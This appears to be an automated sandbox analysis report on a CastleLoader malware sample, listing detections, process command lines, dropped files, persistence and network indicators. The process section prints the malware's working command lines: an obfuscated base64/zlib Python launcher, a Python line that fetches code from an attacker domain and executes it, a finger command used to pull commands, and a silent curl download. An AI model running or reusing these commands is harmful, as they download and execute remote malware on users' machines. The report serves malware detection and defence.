File name:

dummy.txt

Full analysis: https://app.any.run/tasks/d8acce2c-4fd8-45d4-96c3-64c1fd77e094
Verdict: Malicious activity
Threats:

CastleLoader is a modern malware loader designed to quietly establish initial access and deliver follow-up payloads such as stealers, RATs, and ransomware. It focuses on stealth, flexibility, and rapid payload rotation, making it an effective tool for financially motivated threat actors and a persistent problem for enterprise defenders.

Analysis date: April 17, 2026, 13:45:06
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
python
arch-exec
arch-doc
castleloader
loader
websocket
Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5:

275876E34CF609DB118F3D84B799A790

SHA1:

829C3804401B0727F70F73D4415E162400CBE57B

SHA256:

B5A2C96250612366EA272FFAC6D9744AAF4B45AACD96AA7CFCB931EE3B558259

SSDEEP:

3:5n:5n

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • CASTLELOADER has been detected (YARA)

      • 15272682927448.exe (PID: 2204)
    • Create files in the Startup directory

      • 15272682927448.exe (PID: 2204)
    • CASTLELOADER mutex has been found

      • pythonw.exe (PID: 5452)
      • pythonw.exe (PID: 5520)
  • SUSPICIOUS

    • Starts CMD.EXE and keeps the shell open after execution

      • cmd.exe (PID: 7260)
      • cmd.exe (PID: 7448)
    • Process drops python dynamic module

      • tar.exe (PID: 5228)
      • 15272682927448.exe (PID: 2204)
    • The process drops C-runtime libraries

      • tar.exe (PID: 5228)
      • curl.exe (PID: 7604)
      • 15272682927448.exe (PID: 2204)
    • Executable content was dropped or overwritten

      • tar.exe (PID: 5228)
      • cmd.exe (PID: 7448)
      • 15272682927448.exe (PID: 2204)
    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 7448)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2960)
    • Starts Curl with silent output flags

      • curl.exe (PID: 7604)
    • Application launched itself

      • 15272682927448.exe (PID: 2016)
      • pythonw.exe (PID: 5452)
    • The executable file from the user directory is run by the CMD process

      • 15272682927448.exe (PID: 2016)
    • Loads Python modules

      • 15272682927448.exe (PID: 2016)
      • 15272682927448.exe (PID: 2204)
      • pythonw.exe (PID: 5452)
      • pythonw.exe (PID: 5520)
    • The process executes files with name similar to system file names

      • cmd.exe (PID: 7448)
    • Reads the date of Windows installation

      • StartMenuExperienceHost.exe (PID: 2728)
      • SearchApp.exe (PID: 7352)
  • INFO

    • FOR cycle in command line

      • cmd.exe (PID: 7448)
      • cmd.exe (PID: 7260)
    • Application launched itself

      • cmd.exe (PID: 7260)
      • cmd.exe (PID: 7448)
    • Checks supported languages

      • tar.exe (PID: 5228)
      • curl.exe (PID: 7604)
      • curl.exe (PID: 4300)
      • 15272682927448.exe (PID: 2016)
      • 15272682927448.exe (PID: 2204)
      • TextInputHost.exe (PID: 7544)
      • StartMenuExperienceHost.exe (PID: 2728)
      • SearchApp.exe (PID: 7352)
      • pythonw.exe (PID: 5452)
      • pythonw.exe (PID: 5520)
    • Creates files or folders in the user directory

      • tar.exe (PID: 5228)
      • curl.exe (PID: 7604)
      • explorer.exe (PID: 1176)
      • 15272682927448.exe (PID: 2204)
    • Execution of CURL command

      • cmd.exe (PID: 7448)
    • Reads the computer name

      • curl.exe (PID: 7604)
      • 15272682927448.exe (PID: 2204)
      • TextInputHost.exe (PID: 7544)
      • curl.exe (PID: 4300)
      • StartMenuExperienceHost.exe (PID: 2728)
      • SearchApp.exe (PID: 7352)
      • pythonw.exe (PID: 5520)
    • The sample compiled with english language support

      • curl.exe (PID: 7604)
      • tar.exe (PID: 5228)
      • 15272682927448.exe (PID: 2204)
    • Python executable

      • 15272682927448.exe (PID: 2016)
      • 15272682927448.exe (PID: 2204)
      • pythonw.exe (PID: 5452)
      • pythonw.exe (PID: 5520)
    • Reads security settings of Internet Explorer

      • explorer.exe (PID: 1176)
      • StartMenuExperienceHost.exe (PID: 2728)
      • 15272682927448.exe (PID: 2204)
    • Process checks computer location settings

      • StartMenuExperienceHost.exe (PID: 2728)
      • SearchApp.exe (PID: 7352)
      • 15272682927448.exe (PID: 2204)
    • Reads the machine GUID from the registry

      • SearchApp.exe (PID: 7352)
      • 15272682927448.exe (PID: 2204)
      • pythonw.exe (PID: 5452)
      • pythonw.exe (PID: 5520)
    • Reads Environment values

      • SearchApp.exe (PID: 7352)
      • pythonw.exe (PID: 5520)
    • Launching a file from the Startup directory

      • 15272682927448.exe (PID: 2204)
    • Reads product name

      • pythonw.exe (PID: 5520)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes
157
Monitored processes
20
Malicious processes
6
Suspicious processes
0

Behavior graph

  • start
  • cmd.exe (no specs)
  • conhost.exe (no specs)
  • cmd.exe
  • conhost.exe (no specs)
  • cmd.exe (no specs)
  • finger.exe
  • taskkill.exe (no specs)
  • curl.exe
  • tar.exe
  • 15272682927448.exe (no specs)
  • 15272682927448.exe #CASTLELOADER
  • conhost.exe (no specs)
  • curl.exe
  • explorer.exe (no specs)
  • startmenuexperiencehost.exe (no specs)
  • textinputhost.exe (no specs)
  • searchapp.exe
  • mobsync.exe (no specs)
  • pythonw.exe #CASTLELOADER (no specs)
  • pythonw.exe #CASTLELOADER

Process information

PID
CMD
Path
Indicators
Parent process
PID:
1176
CMD:
explorer.exe
Path:
C:\Windows\explorer.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Version:
10.0.19041.3758 (WinBuild.160101.0800)
Modules
Images
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shcore.dll
PID:
2016
CMD:
"C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\15272682927448.exe" -c "import sys,subprocess as s,base64 as b,zlib as z;s.Popen([sys.executable,'-c',z.decompress(b.b64decode('eJydk8tKAzEYhbMWfAfBheOi47S11RF8AEHERaFL6SWDhd7sJNXH9wS/YAiKg4uPZPJfcnKSOTfGvIuROIgHcSOm4lk8iUfxJuZiIk7FiViJjdiLHfVOnIkW1h3zXRK3HWs832tYobFk3aLbM2+pjb1TjaHmRSyS2hn5ltiSeUPMU+uIvzJ36G2TnkH7Nun3kZzj/gfPuujx9DyydsCDhtGi+S8N0Y9Fpue//pZZ7Q4/LPsX4uIXv+7EFQTtG+Khrsf8yB5bejrya/P1jvtiIMZ4ZtEd6q+TeMXaiNw5sbB2ix819T1yhvi7ZKzIq6gfs16jqU3ucMi5LzMPZ/Qrklh8a/He4nf0znPuJtEbe8f7zP+p0ny/Lwt7eg6I97Me8Z1ELQVjyPkEeJZbCg==')).decode('utf-32')],creationflags=s.CREATE_NO_WINDOW)"
Path:
C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\15272682927448.exe
Parent process:
cmd.exe
User:
admin
Company:
Python Software Foundation
Integrity Level:
MEDIUM
Description:
Python
Exit code:
0
Version:
3.15.0a1
Modules
Images
c:\users\admin\appdata\local\python-3.15.0a1-embed-win32\15272682927448.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ucrtbase.dll
c:\users\admin\appdata\local\python-3.15.0a1-embed-win32\vcruntime140.dll
PID:
2204
CMD:
C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\15272682927448.exe -c "#w5rI7WPNLqbT import ssl import time import urllib.request ssl._create_default_https_context = ssl._create_unverified_context c = urllib.request.urlopen('https://dmtn-tv.net/95126aeb-4120-56b1-8c9e-63fdf0c0b6f9/scr3').read().decode('utf-8') time.sleep(2.1) exec(c)"
Path:
C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\15272682927448.exe
Parent process:
15272682927448.exe
User:
admin
Company:
Python Software Foundation
Integrity Level:
MEDIUM
Description:
Python
Exit code:
0
Version:
3.15.0a1
Modules
Images
c:\users\admin\appdata\local\python-3.15.0a1-embed-win32\15272682927448.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ucrtbase.dll
c:\users\admin\appdata\local\python-3.15.0a1-embed-win32\vcruntime140.dll
PID:
2524
CMD:
taskkill /f /im explorer.exe
Path:
C:\Windows\System32\taskkill.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\taskkill.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID:
2652
CMD:
finger LoIjneLiUv@finger.linked-on.com
Path:
C:\Windows\System32\finger.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCPIP Finger Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\finger.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\sechost.dll
PID:
2728
CMD:
"C:\WINDOWS\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
Path:
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
Parent process:
svchost.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\windows\systemapps\microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy\startmenuexperiencehost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\wincorlib.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
PID:
2960
CMD:
C:\WINDOWS\system32\cmd.exe /c finger LoIjneLiUv@finger.linked-on.com
Path:
C:\Windows\System32\cmd.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
PID:
4104
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
15272682927448.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
4300
CMD:
curl -s -L --tlsv1.2 --ssl-no-revoke linked-on.com/leyts.php?Npier=1
Path:
C:\Windows\System32\curl.exe
Parent process:
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\ucrtbase.dll
PID:
4692
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
23 290
Read events
22 933
Write events
343
Delete events
14

Modification events

Process:
(1176) explorer.exe
Key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{2f5c5e72-85a9-11eb-90a8-9a9b76358421}
Operation:
write
Name:
Data
Value:
Process:
(1176) explorer.exe
Key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{2f5c5e72-85a9-11eb-90a8-9a9b76358421}
Operation:
write
Name:
Generation
Value:
2
Process:
(1176) explorer.exe
Key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{2f5c5e73-85a9-11eb-90a8-9a9b76358421}
Operation:
write
Name:
Data
Value:
Process:
(1176) explorer.exe
Key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{2f5c5e73-85a9-11eb-90a8-9a9b76358421}
Operation:
write
Name:
Generation
Value:
2
Process:
(1176) explorer.exe
Key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{eaf65672-68c3-4f99-8d5c-104b5f4d8fff}
Operation:
write
Name:
Data
Value:
Process:
(1176) explorer.exe
Key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{eaf65672-68c3-4f99-8d5c-104b5f4d8fff}
Operation:
write
Name:
Generation
Value:
2
Process:
(1176) explorer.exe
Key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{2f5c5e71-85a9-11eb-90a8-9a9b76358421}
Operation:
write
Name:
Data
Value:
Process:
(1176) explorer.exe
Key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{2f5c5e71-85a9-11eb-90a8-9a9b76358421}
Operation:
write
Name:
Generation
Value:
2
Process:
(1176) explorer.exe
Key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:
delete value
Name:
DesktopReadyTimeout
Value:
Process:
(1176) explorer.exe
Key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Feeds\DSB
Operation:
write
Name:
IsDynamicContentAvailable
Value:
1
Executable files
91
Suspicious files
23
Text files
48
Unknown types
0

Dropped files

PID
Process
Filename
Type
PID:
7604
Process:
curl.exe
Filename:
C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32.pdf
Type:
compressed
MD5:E38115BAF281C754710FC9DC82D85A22
SHA256:623A7CE2A9429AB87E65098775276E4F97A511D73A84AC61AC89794555E91D7B
PID:
5228
Process:
tar.exe
Filename:
C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\vcruntime140.dll
Type:
executable
MD5:C33386A6E67BE415A24D9C431FFD42AC
SHA256:EB5B47CCEDDB4A45E059C1E1FCD2EFB016CB2BD9FE1FC0FD3F4C3C4CAB04153A
PID:
5228
Process:
tar.exe
Filename:
C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\select.pyd
Type:
executable
MD5:696674C76BFEE9C73D86F7B7BBC11F83
SHA256:3B797611AD41332BE215CF38F903E70625DA08753EEDAAC26F8C2B3CA4B6592C
PID:
5228
Process:
tar.exe
Filename:
C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\pyexpat.pyd
Type:
executable
MD5:3FD45F485295DD44F280E0F3E1D89FBA
SHA256:4BBD6A9BF25B5B3616FDB214A05462892CF628EE2BDF38B0DDC2C8C1223203B5
PID:
5228
Process:
tar.exe
Filename:
C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\unicodedata.pyd
Type:
executable
MD5:3095739C768F05A913CAE0578EE34A51
SHA256:D5F53B2183DEB73C539C6B903306116CD5D917484ACE9140A851AA36FA0395A1
PID:
5228
Process:
tar.exe
Filename:
C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\_bz2.pyd
Type:
executable
MD5:B1E173462284FBEB6F25EEFBC52C97B1
SHA256:84A98E00373C9A29AFF42D6176AF4DEEA267F8B168CC76C715E52ED96F85194C
PID:
5228
Process:
tar.exe
Filename:
C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\winsound.pyd
Type:
executable
MD5:F1D44CE05242350723EDF54C20E0337C
SHA256:17EAEA4765965FD0A20803A52C7BE9908E1320FF6AF2D1286D7FD6B488BBC26F
PID:
5228
Process:
tar.exe
Filename:
C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\_asyncio.pyd
Type:
executable
MD5:7B72F6CD4EE18893672DD2E48C88BCE7
SHA256:DA2AA115615A0B37C902F87E46338010C1677BE9CEA608DB04558AFBAC8B4B6A
PID:
5228
Process:
tar.exe
Filename:
C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\_decimal.pyd
Type:
executable
MD5:D8DF454B10FEA5BF5AD5FC6EDE54791E
SHA256:9AB8193ECCD26D0AE50805348B252EB26619AEE8766C56CAC13473B775483AF3
PID:
5228
Process:
tar.exe
Filename:
C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\_elementtree.pyd
Type:
executable
MD5:F205F8095AA3050AD8A300D73915E9B9
SHA256:35C582365890CC4F33A3A84BC943AD15D716FEC69DD230E077734A3AF16F1D27
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
80
TCP/UDP connections
40
DNS requests
29
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
7352
SearchApp.exe
GET
304
2.16.204.153:443
https://www.bing.com/rp/ANzUnPnVY0oL0XWxs0RLJxjJLUo.br.js
NL
whitelisted
7604
curl.exe
GET
200
151.101.0.223:443
https://www.python.org/ftp/python/3.15.0/python-3.15.0a1-embed-win32.zip
US
compressed
5.00 Mb
unknown
4300
curl.exe
GET
301
188.114.96.3:80
http://linked-on.com/leyts.php?Npier=1
US
html
366 b
unknown
7352
SearchApp.exe
GET
200
23.11.40.157:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAjTxtAB8my1oj8MfWpz%2F7Y%3D
NL
binary
312 b
whitelisted
8140
svchost.exe
GET
200
2.16.164.120:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
8140
svchost.exe
GET
200
23.59.18.102:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
US
binary
814 b
whitelisted
2204
15272682927448.exe
GET
200
104.18.21.213:80
http://e7.c.lencr.org/44.crl
US
binary
57.1 Kb
whitelisted
7352
SearchApp.exe
GET
200
204.79.197.203:80
http://oneocsp.microsoft.com/ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgUABBQ3L3%2F%2Fa6ADK8NraY2GXzVaYrHG4AQUb6t%2B2v%2BXQ3LsO2d33oJhNYhHQoUCEzMAAAAGb6JMMcOVb6sAAAAAAAY%3D
US
binary
959 b
whitelisted
7352
SearchApp.exe
POST
204
2.16.204.153:443
https://www.bing.com/threshold/xls.aspx
NL
whitelisted
7352
SearchApp.exe
POST
204
2.16.204.153:443
https://www.bing.com/threshold/xls.aspx
NL
whitelisted

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
8140
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:137
Not routed
whitelisted
5276
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
48.192.1.65:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
2652
finger.exe
107.170.45.91:79
finger.linked-on.com
DIGITALOCEAN-ASN
US
unknown
7604
curl.exe
151.101.0.223:80
www.python.org
FASTLY
US
whitelisted
7604
curl.exe
151.101.0.223:443
www.python.org
FASTLY
US
whitelisted
4300
curl.exe
188.114.96.3:80
linked-on.com
CLOUDFLARENET
US
whitelisted
4300
curl.exe
188.114.96.3:443
linked-on.com
CLOUDFLARENET
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 4.231.128.59
  • 20.73.194.208
whitelisted
activation-v2.sls.microsoft.com
  • 48.192.1.65
whitelisted
google.com
  • 142.251.20.113
  • 142.251.20.138
  • 142.251.20.101
  • 142.251.20.139
  • 142.251.20.100
  • 142.251.20.102
whitelisted
finger.linked-on.com
  • 107.170.45.91
unknown
www.python.org
  • 151.101.0.223
  • 151.101.64.223
  • 151.101.128.223
  • 151.101.192.223
whitelisted
linked-on.com
  • 188.114.96.3
  • 188.114.97.3
unknown
dmtn-tv.net
  • 170.130.165.109
unknown
www.bing.com
  • 2.16.204.153
  • 2.16.204.150
  • 2.16.204.148
  • 2.16.204.141
  • 2.16.204.145
  • 2.16.204.160
  • 2.16.204.142
  • 2.16.204.151
  • 2.16.204.147
whitelisted
crl.microsoft.com
  • 2.16.164.120
  • 2.16.164.49
  • 2.16.164.72
whitelisted
www.microsoft.com
  • 23.59.18.102
  • 88.221.169.152
whitelisted

Threats

PID
Process
Class
Message
8140
svchost.exe
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
5520
pythonw.exe
Misc activity
ET INFO Observed ZeroSSL SSL/TLS Certificate
5520
pythonw.exe
Not Suspicious Traffic
INFO [ANY.RUN] Websocket Upgrade Request
No debug info